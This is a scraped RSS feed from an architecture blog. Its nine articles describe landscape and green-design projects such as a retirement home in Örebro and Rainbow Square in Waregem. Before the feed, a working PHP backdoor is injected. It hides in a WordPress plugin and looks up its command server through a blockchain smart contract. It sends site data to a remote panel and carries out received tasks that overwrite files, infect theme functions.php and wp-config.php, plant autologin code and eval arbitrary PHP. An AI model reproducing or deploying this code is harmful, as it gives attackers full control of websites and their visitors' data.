// o7_pw if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/var/www/vhosts/archi-dome.com/httpdocs/wp-content/plugins/hseo/hseo.php', 'ctrl'=>'// o7_pw', 'vis'=>'// g8_rt', 'vis_func'=>'wp_qwa00j', 'vis_paths'=>array('/var/www/vhosts/archi-dome.com/httpdocs/wp-content/plugins/hseo/hseo.php'), 'opt'=>'_wp_2sf9ssqh', ); $keys=array(); $keys['id']='wq8'; $keys['ver']='zo'; $keys['caps']='yzs'; $keys['tasks']='xg7'; $keys['interval']='8la'; $keys['ack_id']='2ji'; $keys['ok']='n3'; $keys['detail']='67p'; $keys['inv']='bbc'; $keys['result']='i3y'; $hdr='X-1G2-Auth';$tok='0KimxF7Cqz2aqf2N7AyMSDyOWH2Q2AmxBldrZ-J4Tj8';$id='ee8dc371ebfd5861';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); Ruby Campbell – archi-dome https://archi-dome.com Wed, 29 May 2024 11:23:15 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 Retirement Home “Trädgårdarna”: A Harmonious Blend of Nature and Care https://archi-dome.com/green-design/retirement-home-tradgardarna-a-harmonious-blend-of-nature-and-care/ https://archi-dome.com/green-design/retirement-home-tradgardarna-a-harmonious-blend-of-nature-and-care/#respond Fri, 17 May 2024 11:05:06 +0000 https://archi-dome.com/?p=4763 Vision and Design Concept

In Örebro, a town east of Stockholm, the municipality has made significant strides in enhancing the living environments for its elderly residents. One of the standout projects is the retirement home “Trädgårdarna” (The Gardens), designed by LAND arkitektur. This project aims to create a living space that is not only safe but also stimulating, attractive, and surprising, drawing on the latest research in elder care.

Diverse and Stimulating Outdoor Spaces

The design of “Trädgårdarna” focuses on providing diverse outdoor spaces that encourage movement and independence among residents. The retirement home features atrium gardens tailored to various needs. Some gardens are designed for residents who require minimal stimuli, offering peaceful and calming environments, while others are larger and cater to communal activities, providing a higher level of sensory engagement.

Accessibility and Safety

A key aspect of the design is to ensure that outdoor areas are accessible to residents with functional impairments. Paths and gardens are laid out in a way that minimizes the risk of residents with dementia getting lost, promoting independent exploration in a safe environment.

Interaction with Nature

The selection of plants in “Trädgårdarna” is deliberate, aimed at attracting a variety of insects and birds, thus enhancing the sensory experiences available to residents throughout the year. The changing seasons bring different sights, sounds, and smells, which residents can enjoy from their living rooms and bedrooms, as well as the gardens.

Architectural Harmony

The layout of the gardens is reminiscent of a monastery, creating defined and serene interior outdoor spaces that seamlessly integrate with the larger local environment. This design choice ensures that the gardens not only enhance the aesthetic appeal of the retirement home but also harmonize with the surrounding landscape. The interaction between the outdoor spaces and the building’s architecture symbolizes the marriage of attractive design and safe accommodation.

Conclusion

“Trädgårdarna” in Örebro is a testament to the potential of thoughtful design in improving the quality of life for elderly residents. By creating diverse, accessible, and nature-integrated spaces, LAND arkitektur has crafted an environment that promotes independence, safety, and sensory enrichment, setting a new standard for retirement homes.

]]>
https://archi-dome.com/green-design/retirement-home-tradgardarna-a-harmonious-blend-of-nature-and-care/feed/ 0
Rems-Murr-Klinikum A Harmonious Blend of Architecture and Landscape https://archi-dome.com/green-design/rems-murr-klinikum-a-harmonious-blend-of-architecture-and-landscape/ https://archi-dome.com/green-design/rems-murr-klinikum-a-harmonious-blend-of-architecture-and-landscape/#respond Fri, 17 May 2024 11:05:06 +0000 https://archi-dome.com/?p=4764 Integration of Buildings and Park

The design concept for Rems-Murr-Klinikum, crafted by hutterreimann Landschaftsarchitektur in collaboration with Hascher Jehle architects, seamlessly integrates the clinic buildings with an expansive park. The architectural structures interweave with the surrounding landscape, creating a harmonious environment that enhances the quality of life for both patients and visitors.

Urban Entity and Central Piazza

The newly constructed gazebos, designated as Houses A, B, C, and D, are strategically arranged around a central square, known as the ‘Piazza,’ forming a cohesive urban entity. This Piazza serves as the primary access point to the buildings, with House A’s main entrance being prominently located here. The uniformly paved surface of the Piazza is complemented by a lush central garden, offering a serene space for relaxation. Blooming shrubs, perennials, and grasses form the garden’s foundation, while flowering cherry trees provide a light canopy. Multifunctional wooden elements beneath these trees invite visitors to linger and enjoy the outdoor space.

Nature-Oriented Patient’s Garden

Connected to the eastern and southern peripheries of the Piazza is the ‘Patient’s Garden,’ designed as a nature-oriented landscape park. This garden encourages leisurely walks and moments of contemplation. Gently sloping meadows lead towards the existing copse along the Zipfelbach stream. The landscape alternates between freely arranged groves and open lawns, developed as fertile meadows with grasses and wild herbs under extensive care.

Restoration and Relaxation Spaces

As part of the compensation measures for the new buildings, the western brookside is reinstated, creating small relaxation spaces that offer opportunities to experience the stream. The existing ponds are preserved, with their surrounding areas maintained as nature-oriented zones to foster ecological succession and act as a buffer between the ponds and the Patient’s Garden. A simple network of pathways with water-bound surfaces traverses the lawns from north to south, and an existing trench is transformed into a near-natural stream.

Additional Features and Green Spaces

The café on the ground floor of House A boasts an additional terrace with a southwestern exposure, enhancing the dining experience with outdoor seating. Green courtyards within the health center allow natural light to penetrate interior spaces, providing ‘green work breaks’ and offering views of tranquil garden scenes. Rooftop areas are covered with extensive green vegetation, featuring small terraces that offer open spaces for patients and employees, along with views of the surrounding landscape.

By integrating the clinic buildings with the parkland, Rems-Murr-Klinikum creates a serene and therapeutic environment, fostering well-being through its thoughtful design and connection to nature.

]]>
https://archi-dome.com/green-design/rems-murr-klinikum-a-harmonious-blend-of-architecture-and-landscape/feed/ 0
Revitalizing the Glatt River: Fil Bleu by Studio Vulkan Landschaftsarchitektur https://archi-dome.com/green-design/revitalizing-the-glatt-river-fil-bleu-by-studio-vulkan-landschaftsarchitektur/ https://archi-dome.com/green-design/revitalizing-the-glatt-river-fil-bleu-by-studio-vulkan-landschaftsarchitektur/#respond Fri, 17 May 2024 11:05:02 +0000 https://archi-dome.com/?p=4765 Historical Evolution of the Glatt River

The Glatt River has undergone significant transformations, evolving from an Ice Age wetland to an industrial waterway, and now to a town stream. This dynamic history reflects a series of distinct images shaped by various phases of development. Currently, with expanding housing projects, the river faces increasing demands for recreational and transit space. However, these pressures conflict with the needs for nature conservation and flood protection.

Vision and Design Concept of Fil Bleu

“Fil Bleu” represents a unified vision for the Glatt River basin, developed collaboratively by the surrounding communities and the canton of Zürich. The design treats the two banks of the river differently to address local conditions. The left bank is revitalized with a riverside path that includes recreational facilities, encouraging closer interaction between people and the river. Conversely, the right bank is renaturalized, with limited access to preserve its natural state.

Strengthening the River Basin’s Identity

To enhance the identity of the river basin as a cohesive park space shared by neighboring communities, recurring design elements are strategically integrated. These include seating areas facing the stream, steps leading to spaces at the water’s edge, and lighting that highlights the numerous bridges, ensuring safety at night. Temporary furniture elements are also introduced to make the space immediately recognizable and usable for recreation, despite the long-term nature of the project.

Holistic Approach to Urban and Natural Integration

The transformation of the Glatt River basin under the Fil Bleu project adheres to a set of principles that balance development with environmental preservation. This approach positions the river not merely as an extension of the housing developments but as a holistic element of the open space. It integrates the natural landscape with the urban environment, creating a continuous park space that benefits both the ecosystem and the community.

By carefully balancing recreational use, conservation, and urban development, the Fil Bleu project by Studio Vulkan Landschaftsarchitektur offers a sustainable vision for the future of the Glatt River, ensuring it remains a valuable and vibrant part of the region’s natural and urban fabric.

]]>
https://archi-dome.com/green-design/revitalizing-the-glatt-river-fil-bleu-by-studio-vulkan-landschaftsarchitektur/feed/ 0
Rainbow Square A Dynamic Transformation by Sweco Belgium https://archi-dome.com/green-design/rainbow-square-a-dynamic-transformation-by-sweco-belgium/ https://archi-dome.com/green-design/rainbow-square-a-dynamic-transformation-by-sweco-belgium/#respond Fri, 17 May 2024 11:05:00 +0000 https://archi-dome.com/?p=4767 From Parking Lot to Vibrant Public Space

Until recently, Rainbow Square in Waregem was nothing more than an asphalt parking lot primarily associated with the nearby football stadium. The area underwent a significant transformation with the addition of an office building, a hotel, two apartment buildings, and the renovation of the football stadium. This change shifted the space from a monofunctional parking area to a dynamic and flexible public space. During home matches of the local football team, Essevee, the area accommodates over 12,000 people. On other days, it serves as a high-quality meeting and living space for passers-by, visitors, and residents.

A Landmark Entrance to Waregem

Located along the Waregem ring road (R35), Rainbow Square is a prominent site for anyone driving from the E17 towards the city center. Waregem aimed to make this square a landmark entrance to the city. Due to the dense presence of buildings on the site, integrating as much greenery as possible into the design was essential.

Integrating Green Spaces

Previously, the site was dominated by asphalt with only a few small, narrow green strips. Today, the area has been cleared of car traffic, only accessible to fire and capture vehicles during home matches. The paved area, initially 8000m², has been reduced to 5850m², with 1600m² covered in grass concrete tiles. This reduction in net paving by almost 50% allows for more green space and better water management.

Sustainable Water Management

A primary goal of the redesign was to retain all rainwater on-site. Rainwater falling on the paved areas flows towards wadis, where it can be buffered and infiltrated. If the water level becomes too high, it flows via special culvert connections to the rainwater drain. The zone required for the fire department was laid out with grass concrete tiles, and a water-permeable foundation was used to maximize infiltration into the subsoil.

Designing for Functionality and Aesthetics

The project design was guided by an analysis of expected walking routes combined with the architecture of the surrounding buildings. This resulted in an organic yet structured layout. The extra width required for fire department accessibility and zones for capture vehicles was created using grass concrete tiles, with a precise pattern of 50% concrete and 50% grass. This design creates a beautiful interplay of lines that complement the organic shapes of the overall layout.

Accessibility and Comfort

To ensure integral accessibility, the benches are easily and comfortably reachable through the application of a closed stone in the same format as the grass concrete tile. This thoughtful design ensures that Rainbow Square is not only visually appealing but also functional and accessible for all visitors.

Rainbow Square has successfully transitioned from a simple parking lot to a vibrant public space, enhancing Waregem’s urban landscape and providing a high-quality environment for its users.

]]>
https://archi-dome.com/green-design/rainbow-square-a-dynamic-transformation-by-sweco-belgium/feed/ 0
Rådhustorget A Historical and Cultural Transformation by Karavan Landskapsarkitekter https://archi-dome.com/green-design/radhustorget-a-historical-and-cultural-transformation-by-karavan-landskapsarkitekter/ https://archi-dome.com/green-design/radhustorget-a-historical-and-cultural-transformation-by-karavan-landskapsarkitekter/#respond Fri, 17 May 2024 11:04:57 +0000 https://archi-dome.com/?p=4768 Inspired by Vadstena’s Rich Heritage

The design for Rådhustorget, the town hall square in Vadstena, is deeply rooted in the town’s historical and cultural essence. Drawing inspiration from Vadstena’s vibrant cultural life—including its theatre, opera, art, and music—as well as its intriguing medieval history and picturesque location by Lake Vättern, the proposal reimagines the square into two distinct yet interconnected spaces: the entrance area and the main square. Both areas reflect the town’s cultural heritage through contrasting designs, materials, and functions, akin to a theatre setup.

The Entrance: A Welcoming Foyer

The entrance area, or entréplatsen, serves as a welcoming foyer, reminiscent of a theatre lobby where people gather under chandeliers, enjoy snacks, and engage in conversation. This space forms a clear boundary against the adjacent street with a cohesive floor design. The sunniest part of the entrance area features a paved section for outdoor seating, framed by lush perennial plantings and evergreen elements, creating a semi-green square.

The Main Square: A Grand Salon

Transitioning from the entrance to the main square, Rådhustorget is envisioned as a spacious lounge, or salon, representing Vadstena’s “fine room” for both everyday activities and celebrations. A rectangular surface stretches out like a stage floor, with smooth granite slabs laid in a parquet pattern at the foot of the town hall’s stairs, which serve as the stage. The precise shape and angle of this surface emphasize the town hall’s significance as one of the city’s oldest and most important buildings.

Design Elements and Features

Rådhustorget is designed as a traditional paved square, free from trees and plantings, with the “parquet floor” framed by an embroidery border. A uniform floor of smaller natural stones, arranged in squares, surrounds this central area. To enhance the building’s historic character, a cobblestone border runs along the facades of the town hall. The area closest to the building is cleared of adjacent greenery, and all facades are lined with small granite stones. The square offers ample seating options, including long sofas, chairs, and sunbeds, ensuring comfort and versatility.

Thoughtful Lighting Design

The lighting design, developed in collaboration with Black Lighting Design, enhances the different scales of the space and provides a comfortable ambiance year-round. Elegant lanterns and poles with spotlights illuminate the square and surrounding walkways. These lanterns cast a warm glow over the area, while spotlights highlight the facades with soft, warm light, defining the square and creating a striking backdrop for the space, akin to a theatre stage.

Through its thoughtful design, Rådhustorget beautifully integrates Vadstena’s historical and cultural heritage into a functional and inviting public space, fostering a sense of community and celebration.

]]>
https://archi-dome.com/green-design/radhustorget-a-historical-and-cultural-transformation-by-karavan-landskapsarkitekter/feed/ 0
Reflecting on Art and Climate: New Ark Installation https://archi-dome.com/green-design/reflecting-on-art-and-climate-new-ark-installation/ https://archi-dome.com/green-design/reflecting-on-art-and-climate-new-ark-installation/#respond Fri, 17 May 2024 10:35:48 +0000 https://archi-dome.com/?p=4340 Unveiling Artistic Exploration in Aarhus

Nestled within the Godsbanen area of Aarhus, Denmark, the New Ark installation emerges as a captivating fusion of art and environmental consciousness. Conceived by Rumgehor, Stine Rosdahl-Petersen, and Tideland Studio, this 50-meter-long artwork invites viewers to contemplate the interplay between the human body, architectural space, and the ever-changing climate.

Artistic Representation of Water

At its core, New Ark serves as a poignant commentary on water, a vital yet unpredictable element deeply intertwined with contemporary environmental concerns. Constructed adjacent to the Aarhus School of Architecture, the installation features undulating concrete tiles adorned with polished steel lifebuoys. This unique collaboration between architects and artists transforms a narrow alley into a dynamic urban space infused with artistic significance.

Capturing the Essence of Movement

The design of New Ark ingeniously captures the fluidity and dynamism of water through digital simulations. Three lifebuoys, seemingly tossed from the city’s rooftops, are embedded within the concrete surface, creating mesmerizing ripples frozen in time. Each detail, from the waves to the splashes, offers a glimpse into the transient nature of water, inviting contemplation on its allure and potential for destruction.

A Tribute to History and Environment

Beyond its aesthetic appeal, New Ark serves as a poignant reminder of the site’s historical and environmental significance. Situated on land that was once a flooded natural landscape a century ago, the installation pays homage to the invisible narrative of the past. Visitors are encouraged to rest upon the reflective surfaces of the lifebuoys, which mirror the sky above and distort the architectural geometry, bridging the gap between past and present.

Dynamic Spatial Experience

The undulating waves of the tiles redefine the alley’s spatial dynamics, creating a sensory journey for passersby. As pedestrians navigate the space, they are prompted to reflect on the rhythmic cadence of their own movements juxtaposed against the fluidity of the waves. Amidst the urban hustle, New Ark offers a moment of introspection and connection with the natural world, redefining public space as a canvas for artistic expression and environmental discourse.

]]>
https://archi-dome.com/green-design/reflecting-on-art-and-climate-new-ark-installation/feed/ 0
Redefining Community Spaces: Neramit Town-Hall Pavilion https://archi-dome.com/green-design/redefining-community-spaces-neramit-town-hall-pavilion/ https://archi-dome.com/green-design/redefining-community-spaces-neramit-town-hall-pavilion/#respond Fri, 17 May 2024 10:32:37 +0000 https://archi-dome.com/?p=4341 Festival of Creativity and Sustainability

Nestled in Tambon Bang Lamung, Thailand, the Neramit Town-Hall Pavilion stands as a testament to innovation and community engagement. Erected as part of the “Wonderfruit” festival, this pavilion serves as a hub for music, arts, and sustainability initiatives, operating round the clock to accommodate various activities and gatherings.

Embracing Non-Architecture Principles

The pavilion, designed by Bangkok Project Studio, embodies the concept of non-architecture, emphasizing simplicity, affordability, and functionality. Built from a single large triangular roof structure composed of standard square tubes, it exemplifies the integration of architectural elements with local terrain and climate, promoting a harmonious relationship between form and function.

Design Philosophy

At the core of the project lies a profound exploration of architectural principles. The architects challenge traditional notions of design by prioritizing materials that are locally sourced, easily assembled, and environmentally sustainable. By utilizing steel square tubes, they not only ensure structural integrity but also minimize waste and enhance cost-efficiency.

Versatile and Sustainable

The roof, crafted from corrugated zinc sheets, not only provides shelter but also facilitates natural ventilation and ambient lighting. The moveable roof structure allows for dynamic spatial configurations, accommodating diverse activities and events throughout the festival duration. At night, the pavilion transforms into a luminous spectacle, radiating warmth and creativity.

Lessons in Creativity and Resourcefulness

Through the construction process, the architects glean valuable insights into the realm of non-architecture. By repurposing industrial materials and maximizing their aesthetic potential, they blur the lines between functionality and artistry. Moreover, their emphasis on efficient budgeting and material optimization underscores a commitment to sustainable practices and responsible stewardship of resources.

Fostering Emotional Connections

Beyond its functional aspects, the Neramit Pavilion embodies a narrative of cultural resonance and emotional expression. Through the intricate interplay of form and texture, the architects evoke a sense of belonging and community spirit. Every element, from the irregular edges of the roof to the overlapping steel tubes, contributes to a rich tapestry of sensory experiences and collective memories.

A Testament to Innovation

In essence, the Neramit Town-Hall Pavilion stands as a beacon of creativity and collaboration, redefining the boundaries of architectural expression and community engagement. As a symbol of resilience and adaptability, it invites visitors to embrace the spirit of Wonderfruit and embark on a journey of exploration, enlightenment, and sustainable living.

]]>
https://archi-dome.com/green-design/redefining-community-spaces-neramit-town-hall-pavilion/feed/ 0
Transforming Education Infrastructure: National Teachers Colleges Uganda https://archi-dome.com/green-design/transforming-education-infrastructure-national-teachers-colleges-uganda/ https://archi-dome.com/green-design/transforming-education-infrastructure-national-teachers-colleges-uganda/#respond Fri, 17 May 2024 10:30:43 +0000 https://archi-dome.com/?p=4343 Recognized Excellence

The Architizer A+ Awards 2022 recently announced their winners, among which the project National Teachers Colleges (NTC) Uganda stood out, receiving the public award in the category ‘Architecture for Good.’ This accolade celebrates the extensive campus renovation and construction endeavors undertaken near Kaliro and Mubende in Uganda, significantly impacting over 2000 students.

Collaborative Endeavors

A joint venture collaboration between Oubuntu Consulting, DASUDA, and bkvv architects brought this project to fruition. Spearheaded by the Ministry of Education and Sports in Uganda and supported by the Belgium Development Agency, the initiative received funding from the Belgian Government. It signifies a broader national effort to uplift education standards in Uganda, aiming to cultivate future teachers who exemplify positive change.

Enhancing Learning Environments

The project comprises 24 renovated and 8 newly constructed buildings, encompassing various facilities essential for student and teacher well-being. From housing accommodations to classroom structures, energy-efficient kitchens, and sports facilities, every aspect was meticulously designed to create a conducive learning atmosphere.

Climate-Responsive Design

Embracing sustainability principles, National Teachers Colleges Uganda stands as a beacon of Climate Responsive Design, recognized during its inauguration as a best practice example. The architecture prioritizes natural lighting, ventilation, and passive cooling techniques, ensuring thermal comfort without the need for air conditioning. Moreover, the incorporation of locally available materials like bamboo and earth bricks not only promotes community involvement but also reduces project costs and maintenance expenses.

A Symbol of Progress

The completion of this project marks a significant milestone in Uganda’s educational landscape. By providing safer and more sustainable learning environments, NTC sets the stage for a brighter future, where education plays a pivotal role in shaping a better society. As a testament to its success, NTC serves as a reference point for future institutional developments in the country, symbolizing progress and commitment to quality education.

]]>
https://archi-dome.com/green-design/transforming-education-infrastructure-national-teachers-colleges-uganda/feed/ 0
Morning Glory: Fusing Art and Nature https://archi-dome.com/green-design/morning-glory-fusing-art-and-nature/ https://archi-dome.com/green-design/morning-glory-fusing-art-and-nature/#respond Fri, 17 May 2024 10:28:05 +0000 https://archi-dome.com/?p=4344 Unveiling the Installation

Paula de Solminihac and Vicente Donoso brought forth “Morning Glory,” a captivating site-specific art installation gracing Faena Beach during Miami Art Week 2022. This visionary land art creation intertwined with the environment, presenting wooden platforms resembling the Morning Glory plant, enriching the beachscape with its profound symbolism and interactive appeal.

Inspired by Nature

In collaboration with Vicente Donoso, Paula de Solminihac drew inspiration from the resilient Beach Morning Glory plant, abundant along Florida beaches. Mimicking the plant’s form and function, the installation comprised eleven wooden structures, establishing a harmonious relationship between artistic expression and ecological preservation.

A Space for Interaction and Exploration

Transforming Faena Beach into a communal space, “Morning Glory” invited visitors to engage with its tactile and sensory elements. Throughout the day, individuals indulged in various activities, fostering a sense of connection with both the artwork and the natural surroundings.

Metamorphosis at Sunset

As daylight transitioned into dusk, “Morning Glory” underwent a mesmerizing transformation, illuminated against the night sky. Bathed in hues of green and pink, the installation offered a captivating nocturnal spectacle, evoking a sense of wonder and enchantment among spectators.

Fostering Reflection and Collaboration

“Moring Glory” transcended its role as a mere art installation, becoming a catalyst for introspection and dialogue. Recognized by the 2022 Faena Arts Prize jury for its relevance in addressing climate change and environmental concerns, the installation sparked contemplation and shared experiences among viewers.

Celebrating Artistic Innovation

The presentation of the Faena Arts Prize underscored Faena Art’s commitment to artistic experimentation and innovation. As “Morning Glory” captured the public’s imagination, it exemplified the transformative power of art in enriching public spaces and fostering connections with nature.

Embodying the Spirit of Land Art

Paula de Solminihac and Vicente Donoso’s collaborative effort epitomized the essence of land art, seamlessly blending with the natural landscape while engaging viewers on a profound level. “Morning Glory” stood as a testament to the enduring bond between art and nature, leaving an indelible mark on Miami Art Week and beyond.

]]>
https://archi-dome.com/green-design/morning-glory-fusing-art-and-nature/feed/ 0